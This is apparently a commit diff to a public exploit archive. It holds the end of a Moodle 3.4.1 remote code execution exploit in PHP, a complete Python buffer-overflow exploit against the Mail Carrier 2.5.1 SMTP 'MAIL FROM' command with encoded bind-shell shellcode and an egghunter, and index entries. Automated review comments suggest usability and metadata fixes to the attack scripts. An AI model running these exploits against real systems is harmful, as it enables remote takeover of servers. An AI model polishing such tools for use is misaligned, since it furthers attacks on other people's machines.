array_push($headers, "Content-Type: application/json");
} else {
$data = urldecode(http_build_query($data));
}
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_HEADER, true);
curl_setopt($curl, CURLOPT_COOKIEJAR, $this->cookie_jar);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($curl);
$header_size = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
$header = substr($response, 0, $header_size);
$body = substr($response, $header_size);
if ($this->debug) {
echo "[D] Response Header";
echo sprintf("[>] %s", $header);
echo "";
echo "[D] Response Body";
echo sprintf("[>] %s", $body);
}
return [
"header" => $header,
"body" => $body
];
}
function httpGet($route, $session = false)
{
$url = sprintf("%s%s", $this->url, $route);
if ($this->debug) {
echo(sprintf("[D] Doing HTTP GET to URL: %s \n\r", $url));
echo("\n\r");
}
$headers = [];
if ($session) {
array_push($headers, sprintf("Cookie: MoodleSession=%s", $session));
}
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_HEADER, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_COOKIEJAR, $this->cookie_jar);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($curl);
$header_size = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
$header = substr($response, 0, $header_size);
$body = substr($response, $header_size);
if ($this->debug) {
echo "[D] Response Header";
echo sprintf("[>] %s", $header);
echo "";
echo "[D] Response Body";
echo sprintf("[>] %s", $body);
}
return [
"header" => $header,
"body" => $body
];
}
}
parse_str(implode("&", array_slice($argv, 1)), $_GET);
$url = $_GET["url"];
$user = $_GET["user"];
$pass = $_GET["pass"];
$ip = $_GET["ip"];
$port = $_GET["port"];
$course = $_GET["course"];
$debug = isset($_GET["debug"]) ? true : false;
new \exploit\moodle($url, $user, $pass, $ip, $port, $course, $debug);
}
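Review bot: the argument parsing at the bottom of the file reads url, user, pass, ip, port and course from `$_GET` without checking that each key is present, so a missing argument raises an undefined-index notice and passes an empty value into the `\exploit\moodle` constructor; only `debug` is guarded with `isset`. Suggest validating the required keys up front, e.g. `foreach (["url","user","pass","ip","port","course"] as $k) { if (!isset($_GET[$k])) { /* print usage and exit */ } }`, so the script fails with a clear message instead of partway through. Separately, the debug branch in `httpPost` echoes the live MoodleSession cookie value to stdout; the usage text should say that debug output contains the session token so it is not left behind in terminal logs.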

exploits/windows/remote/46547.py Executable file

@ -0,0 +1,111 @@
# Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow
# Date: March 14, 2019
# Exploit Author: Joseph McDonagh
# Vendor Homepage: N/A
# Software Link: N/A
# Version: Mail Carrier 2.5.1
# Tested on: Windows Vista Home Basic SP2
# CVE: None
#!/usr/bin/python
#
# This script started from PWK, Chapter 6
# I am re-purposing it Tabs Mail Carrier 2.5.1 OSCE practice
# During testing, I found the MAIL FROM: is also vulnerable to Buffer Overflow
# Thanks to the original authors of the EHLO parameter, gave me the
starting point and nudge I needed
#
# Usage ./tabs_mail.pwn.py 192.168.1.66
# Bind shell on TCP port 19397
# Tested on Windows Vista Home Basic SP 2
import sys
import socket
import time
if len(sys.argv) < 2:
print "[-]Usage: %s <target addr> " % sys.argv[0]
sys.exit(0)
ipaddr=sys.argv[1]
port=25
callebx="\xb1\x32\x9c\x0f"
sled="\x90" * 8
egg="T00WT00W"
pay=egg
#msfvenom -p windows/shell_bind_tcp LPORT=19397 -b='\x00' -e
x86/shikata_ga_nai -f py | sed 's/buf/pay/g'
#[-] No platform was selected, choosing Msf::Module::Platform::Windows
from the payload
#[-] No arch selected, selecting arch: x86 from the payload
#Found 1 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of py file: 1710 bytes
pay += "\xd9\xe9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x53\xbe\x8c"
pay += "\x69\xbd\xa0\x31\x72\x17\x03\x72\x17\x83\x4e\x6d\x5f"
pay += "\x55\xb2\x86\x1d\x96\x4a\x57\x42\x1e\xaf\x66\x42\x44"
pay += "\xa4\xd9\x72\x0e\xe8\xd5\xf9\x42\x18\x6d\x8f\x4a\x2f"
pay += "\xc6\x3a\xad\x1e\xd7\x17\x8d\x01\x5b\x6a\xc2\xe1\x62"
pay += "\xa5\x17\xe0\xa3\xd8\xda\xb0\x7c\x96\x49\x24\x08\xe2"
pay += "\x51\xcf\x42\xe2\xd1\x2c\x12\x05\xf3\xe3\x28\x5c\xd3"
pay += "\x02\xfc\xd4\x5a\x1c\xe1\xd1\x15\x97\xd1\xae\xa7\x71"
pay += "\x28\x4e\x0b\xbc\x84\xbd\x55\xf9\x23\x5e\x20\xf3\x57"
pay += "\xe3\x33\xc0\x2a\x3f\xb1\xd2\x8d\xb4\x61\x3e\x2f\x18"
pay += "\xf7\xb5\x23\xd5\x73\x91\x27\xe8\x50\xaa\x5c\x61\x57"
pay += "\x7c\xd5\x31\x7c\x58\xbd\xe2\x1d\xf9\x1b\x44\x21\x19"
pay += "\xc4\x39\x87\x52\xe9\x2e\xba\x39\x66\x82\xf7\xc1\x76"
pay += "\x8c\x80\xb2\x44\x13\x3b\x5c\xe5\xdc\xe5\x9b\x0a\xf7"
pay += "\x52\x33\xf5\xf8\xa2\x1a\x32\xac\xf2\x34\x93\xcd\x98"
pay += "\xc4\x1c\x18\x34\xcc\xbb\xf3\x2b\x31\x7b\xa4\xeb\x99"
pay += "\x14\xae\xe3\xc6\x05\xd1\x29\x6f\xad\x2c\xd2\xc4\xeb"
pay += "\xb8\x34\xb0\xe3\xec\xef\x2c\xc6\xca\x27\xcb\x39\x39"
pay += "\x10\x7b\x71\x2b\xa7\x84\x82\x79\x8f\x12\x09\x6e\x0b"
pay += "\x03\x0e\xbb\x3b\x54\x99\x31\xaa\x17\x3b\x45\xe7\xcf"
pay += "\xd8\xd4\x6c\x0f\x96\xc4\x3a\x58\xff\x3b\x33\x0c\xed"
pay += "\x62\xed\x32\xec\xf3\xd6\xf6\x2b\xc0\xd9\xf7\xbe\x7c"
pay += "\xfe\xe7\x06\x7c\xba\x53\xd7\x2b\x14\x0d\x91\x85\xd6"
pay += "\xe7\x4b\x79\xb1\x6f\x0d\xb1\x02\xe9\x12\x9c\xf4\x15"
pay += "\xa2\x49\x41\x2a\x0b\x1e\x45\x53\x71\xbe\xaa\x8e\x31"
pay += "\xce\xe0\x92\x10\x47\xad\x47\x21\x0a\x4e\xb2\x66\x33"
pay += "\xcd\x36\x17\xc0\xcd\x33\x12\x8c\x49\xa8\x6e\x9d\x3f"
pay += "\xce\xdd\x9e\x15"
egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# Build the Buffer
buffer="A" * 700 # 5088 to EIP
buffer+=pay
buffer+="B" * (5088 - (700 + len(pay)))
buffer+=callebx # Overwrite EIP with Call EBX in c:\Windows\System32\expsrv.dll
buffer+=sled # 5100 bytes mark
buffer+="C" * 516 # This put us at the EBX register
buffer+=sled # NOPS
buffer+=egghunter
buffer+="D" * (5900 - len(buffer)) # Padding
try:
print "[-] Attacking Tab MailC Carrier MAIL FROM: with %s bytes" %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect ((ipaddr, port)) # Connect to IP & SMTP port
s.recv(1024) # receive banner
s.send('EHLO root@localhost \r\n') # send EHLO
s.recv(1024) # receive reply
s.send('MAIL FROM: ' + buffer + '\r\n') # Send the phony Mail From
s.recv(1024)
s.send('RCPT TO: evelyn@evelyn \r\n')
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[-] Done!"
except:
print "[-] Could not connect to target"
exit()
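Review bot: the header block is incomplete and inconsistent: `# Vendor Homepage: N/A` and `# Software Link: N/A` leave the affected product unidentifiable for anyone triaging the entry, `# Date: March 14, 2019` disagrees with the 2019-03-15 date recorded for 46547 in files.csv in this same commit, and the tested platform is stated twice with different spellings (`SP2` in the header, `SP 2` in the usage comment). Suggest filling in the vendor and download references and settling on one date. As a formatting point, the `#!/usr/bin/python` shebang sits after the header comments rather than on line 1, so it has no effect, and the wrapped comment continuation lines (`starting point and nudge I needed`, the msfvenom command continuation, `from the payload`) lack a leading `#`; they should be rejoined with the comment lines they belong to.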


@ -17253,6 +17253,7 @@ id,file,description,date,author,type,platform,port
46540,exploits/windows/remote/46540.py,"Apache Tika-server < 1.18 - Command Injection",2019-03-13,"Rhino Security Labs",remote,windows,
46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows,
46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple,
46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
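Review bot: the new 46547 row records the date as 2019-03-15, but the exploit header committed alongside it gives `# Date: March 14, 2019`; one of the two should be corrected so the index and the file agree. The description also drops the `Tabs` vendor prefix used in the file's own title (`Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow`); keeping the vendor name in the index entry helps anyone searching the catalogue by product.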
@ -40987,3 +40988,9 @@ id,file,description,date,author,type,platform,port
46538,exploits/php/webapps/46538.txt,"pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting",2019-03-13,"Gionathan Reale",webapps,php,443
46541,exploits/php/webapps/46541.html,"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)",2019-03-14,LiquidWorm,webapps,php,
46542,exploits/php/webapps/46542.py,"Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution",2019-03-14,R3zk0n,webapps,php,80
46545,exploits/multiple/webapps/46545.txt,"NetData 1.13.0 - HTML Injection",2019-03-15,s4vitar,webapps,multiple,
46546,exploits/php/webapps/46546.py,"CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload",2019-03-15,"Daniele Scanu",webapps,php,80
46548,exploits/php/webapps/46548.txt,"ICE HRM 23.0 - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80
46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
46551,exploits/php/webapps/46551.php,"Moodle 3.4.1 - Remote Code Execution",2019-03-15,"Darryn Ten",webapps,php,80
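Review bot: the 46551 description `Moodle 3.4.1 - Remote Code Execution` omits that the exploit requires valid credentials and a course id (the script takes `user`, `pass` and `course` arguments and drives `/mod/quiz/edit.php` with a MoodleSession cookie), whereas the neighbouring 46546 entry in this hunk is explicitly labelled `Authenticated Arbitrary File Upload`. Suggest `Moodle 3.4.1 - Authenticated Remote Code Execution` or similar so the index conveys the precondition when entries are prioritised.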
